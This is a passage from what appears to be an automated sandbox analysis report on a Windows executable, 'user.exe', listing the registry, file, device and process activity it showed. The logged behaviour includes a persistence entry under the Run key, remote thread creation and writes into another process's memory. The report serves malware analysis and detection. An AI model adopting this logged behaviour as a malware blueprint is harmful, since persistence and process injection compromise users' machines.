HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1

6.b) user.exe - File Activities

	- Files Read:

PIPE\lsarpc

	- Files Modified:

PIPE\lsarpc

\Device\Afd\Endpoint

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	3

	- Device Control Communication:

File	Control Code	Times
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	2
\Device\Afd\Endpoint	AFD_BIND (0x00012003)	1
\Device\Afd\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	1
\Device\Afd\Endpoint	AFD_GET_SOCK_NAME (0x0001202F)	1
\Device\KsecDD	0x00390008	8
\Device\Afd\Endpoint	AFD_SEND_DATAGRAM (0x00012023)	1

	- Memory Mapped Files:

File Name

C:\Documents and Settings\user\user.exe

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\system32\WS2HELP.dll

C:\WINDOWS\system32\WS2_32.dll

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\mswsock.dll

6.c) user.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\Documents and Settings\user\user.exe
	C:\Documents and Settings\user\user.exe /r

	- Remote Threads Created:

Affected Process

C:\Documents and Settings\user\user.exe

	- Thread Overview:

Time	Number of threads
After 49 seconds	1

	- Foreign Memory Regions Read:

Process: C:\Documents and Settings\user\user.exe

	- Foreign Memory Regions Written:

Process: C:\Documents and Settings\user\user.exe

6.d) user.exe - Network Activity

7. user.exe

	- General information about this executable

Analysis Reason:	Started by user.exe
Filename:	user.exe
MD5:	0765a69edaaa5fc1453eda3ec830bbcf
SHA-1:	19460bc79dcd2f16e1f760aaa7eec80918bd93e3
File Size:	23412 Bytes
Command Line:	"C:\Documents and Settings\user\user.exe" /r
Process-status at analysis end:	dead
Exit Code:	0

	- Load-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\ntdll.dll	0x7C900000	0x000AF000
C:\WINDOWS\system32\kernel32.dll	0x7C800000	0x000F6000
C:\WINDOWS\system32\USER32.dll	0x7E410000	0x00091000
C:\WINDOWS\system32\GDI32.dll	0x77F10000	0x00049000
C:\WINDOWS\system32\IMM32.DLL	0x76390000	0x0001D000
C:\WINDOWS\system32\ADVAPI32.dll	0x77DD0000	0x0009B000
C:\WINDOWS\system32\RPCRT4.dll	0x77E70000	0x00092000
C:\WINDOWS\system32\Secur32.dll	0x77FE0000	0x00011000

	- Run-time Dlls

Module Name	Base Address	Size
C:\WINDOWS\system32\hnetcfg.dll	0x662B0000	0x00058000
C:\WINDOWS\system32\mswsock.dll	0x71A50000	0x0003F000
C:\WINDOWS\System32\wshtcpip.dll	0x71A90000	0x00008000
C:\WINDOWS\system32\WS2HELP.dll	0x71AA0000	0x00008000
C:\WINDOWS\system32\WS2_32.dll	0x71AB0000	0x00017000
C:\WINDOWS\system32\msvcrt.dll	0x77C10000	0x00058000
C:\WINDOWS\system32\SHLWAPI.dll	0x77F60000	0x00076000

7.a) user.exe - Registry Activities

	- Registry Values Modified:

Key	Name	New Value
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Run	user	C:\Documents and Settings\user\user.exe /i

	- Registry Values Read:

Key	Name	Value	Times
HKLM\SYSTEM\CurrentControlSet\Services\Winsock\Parameters	Transports	0x5400630070006900700000004e0065007400420049004f00530000000000	2
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	AuthenticodeEnabled	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	DefaultLevel	262144	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	PolicyScope	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers	TransparentEnabled	1	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemData	0x5eab304f957a49896a006c1c31154015	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	ItemSize	779	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{349d35ab-37b5-462f-9b89-edd5fbde1328}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemData	0x67b0d48b343a3fd3bce9dc646704f394	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	ItemSize	517	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemData	0x327802dcfef8c893dc8ab006dd847d1d	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	ItemSize	918	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemData	0xbd9a2adb42ebd8560e250e4df8162f67	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	ItemSize	229	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{94e3e076-8f53-42a5-8411-085bcc18a68d}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	HashAlg	32771	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemData	0x386b085f84ecf669d36b956a22c01e80	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	ItemSize	370	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes\{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}	SaferFlags	0	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	ItemData	%HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache%OLK*	1
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33}	SaferFlags	0	1
HKLM\System\CurrentControlSet\Control\ComputerName\ActiveComputerName	ComputerName	USER	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	HelperDllName	%SystemRoot%\System32\wshtcpip.dll	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	Mapping	0x0b0000000300000002000000010000000600000002000000010000000000	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MaxSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	MinSockaddrLength	16	1
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Winsock	UseDelayedAcceptance	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters	WinSock_Registry_Version	2.0	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Num_Catalog_Entries	3	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	DisplayString	Tcpip	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	ProviderId	0x409d05229e7ecf11ae5a00aa00a7112b	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	SupportedNameSpace	12	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	DisplayString	NTDS	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	LibraryPath	%SystemRoot%\System32\winrnr.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	ProviderId	0xee37263b80e5cf11a55500c04fd8d4ac	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	SupportedNameSpace	32	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	DisplayString	Network Location Awareness (NLA) Namespace	4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Enabled	1	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	LibraryPath	%SystemRoot%\System32\mswsock.dll	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	ProviderId	0x3a244266a83ba64abaa52e0bd71fdd83	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	StoresServiceClassInfo	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	SupportedNameSpace	15	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003	Version	0	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Next_Catalog_Entry_ID	1012	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Num_Catalog_Entries	11	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	Serial_Access_Num	4	2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005	PackedCatalogItem	%SystemRoot%\system32\rsvpsp.d	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011	PackedCatalogItem	%SystemRoot%\system32\mswsock.	1
HKU\S-1-5-21-1229272821-1004336348-527237240-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders	Cache	C:\Documents and Settings\user\Local Settings\Temporary Internet Files	1

	- Monitored Registry Keys:

Key Name	Watch subtree	Notify Filter	Count
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5	0	Key Change	1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9	0	Key Change	1

7.b) user.exe - File Activities

	- Files Read:

PIPE\lsarpc

	- Files Modified:

PIPE\lsarpc

\Device\Afd\Endpoint

	- File System Control Communication:

File	Control Code	Times
PIPE\lsarpc	0x0011C017	3

	- Device Control Communication:

File	Control Code	Times
\Device\Afd\Endpoint	AFD_GET_INFO (0x0001207B)	2
\Device\Afd\Endpoint	AFD_SET_CONTEXT (0x00012047)	2
\Device\Afd\Endpoint	AFD_BIND (0x00012003)	1
\Device\Afd\Endpoint	AFD_GET_TDI_HANDLES (0x00012037)	1
\Device\Afd\Endpoint	AFD_GET_SOCK_NAME (0x0001202F)	1
\Device\KsecDD	0x00390008	8
\Device\Afd\Endpoint	AFD_SEND_DATAGRAM (0x00012023)	1

	- Memory Mapped Files:

File Name

C:\Documents and Settings\user\user.exe

C:\WINDOWS\System32\wshtcpip.dll

C:\WINDOWS\system32\WS2HELP.dll

C:\WINDOWS\system32\WS2_32.dll

C:\WINDOWS\system32\hnetcfg.dll

C:\WINDOWS\system32\mswsock.dll

7.c) user.exe - Process Activities

	- Processes Created:

Executable	Command Line
C:\Documents and Settings\user\user.exe
	C:\Documents and Settings\user\user.exe /r

	- Remote Threads Created:

Affected Process

C:\Documents and Settings\user\user.exe

	- Thread Overview:

Time

Number of threads

Analysis Report for baad.exe

Summary:

Table of Contents